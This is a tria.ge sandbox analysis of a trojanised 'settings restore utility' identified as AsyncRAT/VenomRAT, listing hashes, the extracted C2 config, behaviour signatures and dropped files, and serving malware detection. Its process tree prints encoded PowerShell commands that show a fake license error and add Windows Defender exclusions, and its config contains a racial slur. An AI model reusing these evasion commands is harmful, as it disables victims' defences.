Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07/02/2025, 03:28

General

  • Target

    EXMSettingsRestoreUtility.exe

  • Size

    122KB

  • MD5

    15f043fb9ac824a896d33502ce43a501

  • SHA1

    e8b8ff0633441603405bf83e57bafa385ca0e784

  • SHA256

    59131a7e8725c4de5a4e1fe5e3febf9f861c22f58ad0cb179bf4d2f419613abf

  • SHA512

    7e9756b1694be946d460d37188e9d193f3e128abe692ca770ef6893f8979800b017b23d4d4a42d6fa546bf12c5f495b3cb6e2fa866e1b805b8a997f50b46d1b9

  • SSDEEP

    3072:Um8Y3AavY9QonIV6fAaCTgDEZ9DAxpz6+l5nlKv0Mp5:U23tvYaeIk5CTgDEZBMuw5nlKvnp

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

193.161.193.99:304480

Mutex

nigger93

Attributes
  • delay

    1

  • install

    true

  • install_file

    nigger93.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • VenomRAT 2 IoCs

    Detects VenomRAT.

  • Venomrat family
  • Async RAT payload 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\EXMSettingsRestoreUtility.exe
    "C:\Users\Admin\AppData\Local\Temp\EXMSettingsRestoreUtility.exe"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2316
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAbgB6ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGQAcABjACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAHYAYQBsAGkAZAAgAGwAaQBjAGUAbgBzAGUALgAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAaAB4AGUAIwA+AA=="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2748
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAbABoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAeQB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABxACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2876
    • C:\Windows\revertsettings.exe
      "C:\Windows\revertsettings.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2840
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\7z6DDDAB18\delete.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2644
    • C:\Windows\aurafarm.exe
      "C:\Windows\aurafarm.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2132

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\7z6DDDAB18\delete.bat

    Filesize

    804B

    MD5

    a5750c0882d205435451003cbe31d9f2

    SHA1

    e30d35353f4e99ad62c1b7514a638ed55a1a35d5

    SHA256

    173a92a2f66bde79504376fa94772687fdb9dc6539ff72a781acb3a23626e5c1

    SHA512

    f9d2e5d7c30411d988712d8b8e0f75b5cbf303e35a9b1108ff57117dcaa1b9eef9e05d19f7f4c79c1fcb365b91c508f5f547f24b0a30a859e473d9916332bdfd

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    d03c5d3f08ab81b39aafc98ad8eb53f6

    SHA1

    9de286020bce353d134ba05f702aa9290d457d46

    SHA256

    b0de74049bcfcecd5556a4e8f7d42a7a81e6f318003f797401732891a9c8060f

    SHA512

    89f4de68ed65465a41a86fe13992540d544915329f222ffaa188bd3bd91d465633350f17f95d68c48db6a881f84310f72a6c2ddd622b5553dcdf34b9eb016bd9

  • C:\Windows\aurafarm.exe

    Filesize

    74KB

    MD5

    80724101ed2cbfb0750ca6b7ac4a9f0e

    SHA1

    f240dd5f7b52974adf43075e0b74126ceb380968

    SHA256

    c866481dc9369e31e4d9a2eb296b2a35849f658141045bba8f879c0c8978bb36

    SHA512

    05dc8267a217d69bedd525be275518e956c859fe781ed57cb8d342434c7c4787fadd0827d5e39a0da450ddd9f463ce91d4a7205a14eb328037af4a869c6fbbe3

  • C:\Windows\revertsettings.exe

    Filesize

    42KB

    MD5

    98cc493ee9f783b20c5d614529d6a34c

    SHA1

    eaf1e20cddf94a131e1b5a85c629d91b631933f0

    SHA256

    55ae6e6612a0106cb0b0723622014474259653c2bf6970eba4725875509e36f8

    SHA512

    f656d45047abeb3f9532e0d606f3ebfb288033195b7c439eedec96761e3a049801a685129e41aed64d3f903882469fbe4e5c20aa15fd0f6e55bfa348d77d6ab9

  • memory/2132-33-0x0000000000D60000-0x0000000000D78000-memory.dmp

    Filesize

    96KB